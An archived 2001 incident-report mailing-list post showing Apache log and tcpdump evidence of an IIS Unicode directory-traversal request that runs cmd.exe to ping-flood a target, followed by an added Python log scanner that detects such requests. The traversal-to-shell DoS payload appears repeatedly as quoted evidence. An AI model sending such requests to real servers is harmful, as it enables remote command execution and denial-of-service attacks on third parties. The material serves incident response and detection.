Okay, this is scary. This looks like an attempt to use a CodeRed II infected system to perform a denial of service attack. I don't think I need to stress the severity of this.

==> /var/log/apache/access_log <==
[deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted target ip]+"-n"+7000+"-w"+0" 404 -

TCPDUMP (I have only removed the source, since editing out the target IP would bork the dump...):

17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.www: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win 16616 (DF) (ttl 110, id 7881, len 157)
0x0000 4500 009d 1ec9 4000 6e06 f3dd d519 f9a4 E.....@.n.......
0x0010 d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0 ..R..9.P/C4...L.
0x0020 5018 40e8 4446 0000 4745 5420 2f73 6372 P.@.DF..GET./scr
0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/
0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe
0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v
0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l"
0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93
0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+"
0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0..

17:19:34.539626 unknown ip 0
0x0000 0000 0000 4510 009d 0000 0000 ff06 c196 ....E...........
0x0010 d519 f9a4 d8d6 521f 0d39 0050 fc34 432f ......R..9.P.4C/
0x0020 fc34 432f 5018 0860 7cff 0000 4745 5420 .4C/P..`|...GET.
0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi
0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd
0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe
0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+
0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2
0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70
0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0.
0x00a0 0a .
17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.www: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win 16616 (DF) (ttl 110, id 11022, len 157)
0x0000 4500 009d 2b0e 4000 6e06 e798 d519 f9a4 E...+.@.n.......
0x0010 d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c ..R....P2*z../:.
0x0020 5018 40e8 0814 0000 4745 5420 2f73 6372 P.@.....GET./scr
0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/
0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe
0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v
0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l"
0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93
0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+"
0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0..

17:20:13.919639 unknown ip 0
0x0000 0000 0000 4510 009d 0000 0000 ff06 0000 ....E...........
0x0010 d519 f9a4 d8d6 521f 1085 0050 e97a 2a32 ......R....P.z*2
0x0020 e97a 2a32 5018 0860 5422 0000 4745 5420 .z*2P..`T"..GET.
0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi
0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd
0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe
0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+
0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2
0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70
0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0.
0x00a0 0a .

As an afterthought, I saw a URL drifting around related to such an idea, http://www.iispacket.com/, although I am not getting that host to respond.

I think this needs immediate attention. I can't do it now; I must go to school.

--
http://c64.arcsnet.net/
ICQ UIN 1551505
"The things you own, they end up owning you." - Tyler Durden

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 15:13:36 PDT
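The request quoted in the post above, run through a small log scanner. This is an added example and not part of the original message or of any SecurityFocus tooling: it parses Apache common-log lines, decodes the overlong UTF-8 sequences such as %c1%9c that IIS's Unicode traversal bug accepted, flags traversal requests that reach cmd.exe or root.exe, and pulls the ping target and its -l/-n/-w arguments out of the command so the DoS target can be reported. The sample log lines, the addresses in them (documentation ranges standing in for the deleted hosts) and the function names are all constructed for this example; only the shape of the request comes from the post.

```python
import re
import shlex
from urllib.parse import unquote_to_bytes

# Constructed sample log lines in Apache common log format, modelled on the
# request quoted in the post. 192.0.2.10 / 198.51.100.7 are documentation
# addresses standing in for the deleted attacker hosts and 203.0.113.5 for the
# deleted ping target; none of them is a real observed address.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+203.0.113.5+"-n"+7000+"-w"+0" 404 -
192.0.2.10 - - [07/Aug/2001:17:20:14 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
198.51.100.7 - - [07/Aug/2001:17:21:00 -0400] "GET /index.html HTTP/1.0" 200 1234
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*)" (?P<status>\d{3}) \S+$'
)
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
SHELLS = ("cmd.exe", "root.exe")  # root.exe is the cmd.exe copy Code Red II drops


def decode_overlong_utf8(raw: bytes) -> str:
    """Turn percent-decoded bytes into text, collapsing 2-byte overlong UTF-8.

    C1 9C is an overlong encoding of '\\' and C0 AF of '/'; the IIS Unicode
    traversal bug decoded them only after its path check, which is how
    '..%c1%9c..' climbs out of /scripts. Other bytes pass through as Latin-1.
    """
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def parse_ping(tokens):
    """Pull the target and -l/-n/-w values out of a tokenised ping command."""
    names = [t.lower().rsplit("\\", 1)[-1] for t in tokens]
    if "ping.exe" not in names and "ping" not in names:
        return None
    start = names.index("ping.exe") if "ping.exe" in names else names.index("ping")
    info = {"target": None, "size": None, "count": None, "timeout": None}
    flags = {"-l": "size", "-n": "count", "-w": "timeout"}
    rest = tokens[start + 1:]
    i = 0
    while i < len(rest):
        tok = rest[i]
        if tok in flags and i + 1 < len(rest) and rest[i + 1].isdigit():
            info[flags[tok]] = int(rest[i + 1])
            i += 2
            continue
        if IPV4_RE.match(tok):
            info["target"] = tok
        i += 1
    return info


def analyze_line(line: str):
    """Return an event dict for a traversal-to-shell request, else None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    method, _, rest = m["req"].partition(" ")
    target = rest.rsplit(" HTTP/", 1)[0]  # drop the protocol token if logged
    path, _, query = target.partition("?")
    decoded_path = decode_overlong_utf8(unquote_to_bytes(path))
    normalized = decoded_path.replace("\\", "/")
    tool = normalized.rsplit("/", 1)[-1].lower()
    if not ("/../" in normalized and tool in SHELLS):
        return None
    # '+' is a space in the query; decode it the same way as the path
    command = decode_overlong_utf8(unquote_to_bytes(query.replace("+", " ")))
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: keep the raw words instead
        tokens = command.split()
    return {
        "host": m["host"], "ts": m["ts"], "status": int(m["status"]),
        "method": method, "decoded_path": decoded_path, "tool": tool,
        "command": tokens, "ping": parse_ping(tokens),
    }


def scan(log_text: str):
    return [ev for ev in (analyze_line(l) for l in log_text.splitlines()) if ev]


if __name__ == "__main__":
    for ev in scan(SAMPLE_LOG):
        print(f'{ev["ts"]} {ev["host"]} -> {ev["tool"]} {" ".join(ev["command"])}')
        p = ev["ping"]
        if p and p["target"]:
            est = p["size"] * p["count"] if p["size"] and p["count"] else None
            print(f'  ping flood target {p["target"]} size={p["size"]} '
                  f'count={p["count"]} (~{est} bytes if -n is honoured)')
```

Because the request in the post was answered with a 404 by Apache, the server that logged it was not harmed; the value of the scan is the source address (an infected IIS host worth reporting) and the extracted ping target, which is the party actually under attack.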